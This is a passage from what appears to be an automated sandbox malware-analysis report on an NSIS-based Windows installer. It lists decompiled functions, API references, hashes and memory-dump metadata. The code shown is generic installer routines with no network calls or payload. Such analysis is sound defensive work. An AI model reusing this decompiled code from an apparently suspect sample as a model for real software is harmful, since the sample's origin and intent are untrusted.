                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BEC
                • MulDiv.KERNEL32(00000000,00000064,?), ref: 00402C16
                • wsprintfA.USER32 ref: 00402C35
                • SetWindowTextA.USER32(?,00417090), ref: 00402C3C
                • SetDlgItemTextA.USER32 ref: 00402C49
                • ShowWindow.USER32(?,00000005,?,00000406,00417090), ref: 00402C51
                • wsprintfA.USER32 ref: 00402C67
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: TextWindowwsprintf$ItemShowTimer
                • String ID: ... %d%%
                • API String ID: 2110197580-2449383134
                • Opcode ID: be9472393d59c88d12cd395d65e6edb92999041bf15d4c00958e30b0f553495c
                • Instruction ID: 99e2debb18c7311ff8eca1142aa4f476a7479ee74c8687a77fe961922a259f3d
                • Opcode Fuzzy Hash: be9472393d59c88d12cd395d65e6edb92999041bf15d4c00958e30b0f553495c
                • Instruction Fuzzy Hash: FC1186347443197BE2249B249D49FAB779CEB49754F004036FE49F63D1D7B8AC4086AD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405D03 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405D03(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405654(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405612("*?|<>/\":", _t5))) == 0) {
							E0040578C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                0x00405d05
                0x00405d0d
                0x00405d21
                0x00405d21
                0x00405d27
                0x00405d34
                0x00405d34
                0x00405d35
                0x00405d37
                0x00405d3b
                0x00405d3d
                0x00405d46
                0x00405d48
                0x00405d62
                0x00405d6a
                0x00405d6a
                0x00405d6f
                0x00405d71
                0x00405d73
                0x00405d77
                0x00405d78
                0x00405d7b
                0x00405d83
                0x00405d85
                0x00405d89
                0x00000000
                0x00000000
                0x00405d8f
                0x00405d94
                0x00000000
                0x00000000
                0x00000000
                0x00405d94
                0x00405d99

                APIs
                • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D5B
                • CharNextA.USER32(?,?,?,00000000), ref: 00405D68
                • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D6D
                • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D7D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Char$Next$Prev
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                • API String ID: 589700163-3021078146
                • Opcode ID: b2affafc5d4ebffb713ac08670eb48a808281b6f76aa7d2bb6a067cae95531ec
                • Instruction ID: 5656e1994ff3a00564090885ccfb713e68030b48685137941c4d6139e5eb1e54
                • Opcode Fuzzy Hash: b2affafc5d4ebffb713ac08670eb48a808281b6f76aa7d2bb6a067cae95531ec
                • Instruction Fuzzy Hash: 8E11BF61804E9529FB3216385C48B7B7FD8CF67760F18847BE8C5722C2D67C5C829A6D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403F5C Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00403F5C(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                0x00403f6e
                0x00404002
                0x00000000
                0x00404002
                0x00403f7f
                0x00403f83
                0x00000000
                0x00000000
                0x00403f89
                0x00403f92
                0x00403f95
                0x00403f95
                0x00403f9b
                0x00403fa1
                0x00403fa1
                0x00403fad
                0x00403fb3
                0x00403fba
                0x00403fbd
                0x00403fc0
                0x00403fc2
                0x00403fc2
                0x00403fca
                0x00403fd0
                0x00403fd0
                0x00403fda
                0x00403fdf
                0x00403fe2
                0x00403fe7
                0x00403fea
                0x00403fea
                0x00403ffa
                0x00403ffa
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: daec5bc1bea3a233e319afa84b0aad6d5d19a9a9e6f37679aab0e943fc6803b1
                • Instruction ID: de1dc0ced46b62e01148019097b19380805317e3bca555cad6edf46d623340dd
                • Opcode Fuzzy Hash: daec5bc1bea3a233e319afa84b0aad6d5d19a9a9e6f37679aab0e943fc6803b1
                • Instruction Fuzzy Hash: C6218471904745ABC7219F68DD08B5BBFF8AF01714F048969F995F22E0D738E904CB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404E9F Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00404E9F(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423704; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x409250; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B16(0, _t39, 0x41fd08, 0x41fd08, _a4);
					}
					_t26 = lstrlenA(0x41fd08);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x4236e8, 0x41fd08);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x41fd08;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd08)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd08, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                0x00404ea5
                0x00404eb1
                0x00404eb4
                0x00404eba
                0x00404ec6
                0x00404ec9
                0x00404ecc
                0x00404ed2
                0x00404ed2
                0x00404ed8
                0x00404ee0
                0x00404ee3
                0x00404f00
                0x00404f04
                0x00404f0d
                0x00404f0d
                0x00404f17
                0x00404f20
                0x00404f2c
                0x00404f33
                0x00404f37
                0x00404f3a
                0x00404f4d
                0x00404f5b
                0x00404f5b
                0x00404f5f
                0x00404f61
                0x00404f64
                0x00000000
                0x00404f64
                0x00404ee5
                0x00404eed
                0x00404ef5
                0x00404efb
                0x00000000
                0x00404efb
                0x00404ef5
                0x00404ee3
                0x00404f6e

                APIs
                • lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                • lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                • lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                • SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                • SendMessageA.USER32 ref: 00404F33
                • SendMessageA.USER32 ref: 00404F4D
                • SendMessageA.USER32 ref: 00404F5B
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                • String ID:
                • API String ID: 2531174081-0
                • Opcode ID: 7086c7c29e23a29a0d0f5e27e31e816319c7e546315a5373774c460fd8fc0529
                • Instruction ID: 494233230377309a29c5d7fe1475590ec4db79cf9780f6ff06810452207601d7
                • Opcode Fuzzy Hash: 7086c7c29e23a29a0d0f5e27e31e816319c7e546315a5373774c460fd8fc0529
                • Instruction Fuzzy Hash: A021A1B1D00109BBDB119FA5DC859DEBFB9EF85354F14807AFA04B6290C3395E41CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040164D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringfileCOMMON
                Download Yara Rule
                C-Code - Quality: 66%
                			E0040164D() {
				int _t18;
				void* _t28;
				void* _t35;

				 *(_t35 + 8) = E00402A85(0xffffffd0);
				 *(_t35 - 8) = E00402A85(0xffffffdf);
				E00405AF4(0x4097f8,  *(_t35 + 8));
				_t18 = lstrlenA( *(_t35 - 8));
				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
					lstrcatA(0x4097f8, 0x40901c);
					lstrcatA(0x4097f8,  *(_t35 - 8));
				}
				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405D9C( *(_t35 + 8)) == 0) {
						 *((intOrPtr*)(_t35 - 4)) = 1;
					} else {
						_push( *(_t35 - 8));
						_push( *(_t35 + 8));
						E00405842();
						_push(0xffffffe4);
						goto L7;
					}
				} else {
					_push(0xffffffe3);
					L7:
					E00401423();
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}






                0x00401656
                0x00401666
                0x0040166a
                0x00401672
                0x00401689
                0x00401691
                0x0040169a
                0x0040169a
                0x004016ad
                0x004016b9
                0x004026bf
                0x004016cf
                0x004016cf
                0x004016d2
                0x004016d5
                0x004016da
                0x00000000
                0x004016da
                0x004016af
                0x004016af
                0x004021ba
                0x004021ba
                0x004021ba
                0x0040291d
                0x00402929

                APIs
                  • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,xwkwrbeiqiuu Setup,NSIS Error), ref: 00405B01
                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 00401672
                • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 0040167C
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp,0040901C,?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 00401691
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp,?,C:\Users\user\AppData\Local\Temp,0040901C,?,?,C:\Users\user\AppData\Local\Temp,?,000000DF,000000D0), ref: 0040169A
                  • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560), ref: 00405DAA
                  • Part of subcall function 00405D9C: FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                  • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                  • Part of subcall function 00405D9C: FindClose.KERNELBASE(00000000), ref: 00405DC8
                  • Part of subcall function 00405842: CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 0040588F
                  • Part of subcall function 00405842: GetShortPathNameA.KERNEL32 ref: 00405898
                  • Part of subcall function 00405842: GetShortPathNameA.KERNEL32 ref: 004058B5
                  • Part of subcall function 00405842: wsprintfA.USER32 ref: 004058D3
                  • Part of subcall function 00405842: GetFileSize.KERNEL32(00000000,00000000,00422138,C0000000,00000004,00422138,?,004055D7,?,00000000,000000F1,?), ref: 0040590E
                  • Part of subcall function 00405842: GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040591D
                  • Part of subcall function 00405842: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405933
                • MoveFileA.KERNEL32 ref: 004016A5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: File$CloseErrorFindModeNamePathShortlstrcatlstrlen$AllocFirstGlobalHandleMoveReadSizelstrcpynwsprintf
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 3481313339-1943935188
                • Opcode ID: e75b227483b277d684e81c244fe92116d8ea64f1996e7cc1bca3a7df97b995de
                • Instruction ID: e3d936c7b2e8568bf3afc9a15eb44f15e117e5a8b541455a4ce6046f775872e9
                • Opcode Fuzzy Hash: e75b227483b277d684e81c244fe92116d8ea64f1996e7cc1bca3a7df97b995de
                • Instruction Fuzzy Hash: 9D119E31A04104BBCF01BFA1CD0899E3A72EF40354F14463BF801B61E6DA7D8A929A4D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040476E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040476E(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                0x0040477c
                0x00404789
                0x0040478f
                0x004047cd
                0x004047cd
                0x004047dc
                0x004047e3
                0x00000000
                0x004047e5
                0x00404791
                0x004047a0
                0x004047a8
                0x004047ab
                0x004047bd
                0x004047c3
                0x004047ca
                0x00000000
                0x004047ca
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                • Opcode ID: 9efa1d1d8051c78a9919a677a3bcd6cf9f744936eeccd393b7e464826a275d3e
                • Instruction ID: 9f845b30ae688ed4ef755a08d3db5d44298bc8acb818865eb6350a94e1b176cf
                • Opcode Fuzzy Hash: 9efa1d1d8051c78a9919a677a3bcd6cf9f744936eeccd393b7e464826a275d3e
                • Instruction Fuzzy Hash: A5015275D00219BADB10DBA4DC85BFFBBBCAB55B15F10412BBB00B72C0D7B469418BA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401FAB Relevance: 9.1, APIs: 6, Instructions: 74libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E00401FAB(int __ebx) {
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t42;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001);
				_t42 =  *0x423fd4 - _t28; // 0x0
				if(_t42 < 0) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A85(0xfffffff0);
					 *(_t37 + 8) = E00402A85(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t33 = LoadLibraryExA(_t35, _t28, 8);
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401423();
						} else {
							goto L4;
						}
					} else {
						_t33 = GetModuleHandleA(_t35);
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404E9F(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x424000, 0x40a7f8, 0x409000);
								} else {
									E00401423( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x423fa8 =  *0x423fa8 +  *(_t37 - 4);
				return 0;
			}









                0x00401fab
                0x00401fb3
                0x00401fb6
                0x00401fbc
                0x00401fc2
                0x00402065
                0x00000000
                0x00401fc8
                0x00401fd0
                0x00401fda
                0x00401fdd
                0x00401fec
                0x00401ff6
                0x00401ffa
                0x00402061
                0x00402067
                0x00402067
                0x00000000
                0x00000000
                0x00000000
                0x00401fdf
                0x00401fe6
                0x00401fea
                0x00401ffc
                0x00402006
                0x0040200a
                0x0040204e
                0x0040200c
                0x0040200f
                0x00402012
                0x00402042
                0x00402014
                0x00402017
                0x00402020
                0x00402022
                0x00402022
                0x00402020
                0x00402012
                0x00402056
                0x00402059
                0x00402059
                0x00000000
                0x00000000
                0x00000000
                0x00401fea
                0x00401fdd
                0x0040206d
                0x0040291d
                0x00402929

                APIs
                • SetErrorMode.KERNEL32(00008001), ref: 00401FB6
                • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FE0
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                  • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                  • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                  • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                  • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FF0
                • GetProcAddress.KERNEL32(00000000,?), ref: 00402000
                • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402059
                • SetErrorMode.KERNEL32 ref: 0040206D
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                • String ID:
                • API String ID: 1609199483-0
                • Opcode ID: b3c38ef729e730e2157f884e1f611eeca49ccdf58f095c449bb0867d8dd0222c
                • Instruction ID: 895be71df4ac45a5aeeb3ddaf5be92ea7e9d143a6a7ef1567a24186397f5d55d
                • Opcode Fuzzy Hash: b3c38ef729e730e2157f884e1f611eeca49ccdf58f095c449bb0867d8dd0222c
                • Instruction Fuzzy Hash: E4210B31D04315EBCB207FA5DE8C95F7A70AB45354B20413BF611B22E0CBBC4A82DA5E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040567B Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 36COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040567B(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x40543a
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405612(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                0x00405684
                0x00405684
                0x0040568b
                0x0040568e
                0x00405693
                0x004056a6
                0x004056c0
                0x00000000
                0x004056c0
                0x004056aa
                0x004056ab
                0x004056ae
                0x004056af
                0x004056b7
                0x00000000
                0x00000000
                0x004056b9
                0x004056bc
                0x00000000
                0x00000000
                0x00000000
                0x004056bc
                0x00000000
                0x0040569c
                0x00000000
                0x0040569d

                APIs
                • CharNextA.USER32(:T@,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\,?,004056DF,C:\,C:\,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,76DDF560,0040543A,?,76DDF560,00000000), ref: 00405689
                • CharNextA.USER32(00000000), ref: 0040568E
                • CharNextA.USER32(00000000), ref: 0040569D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
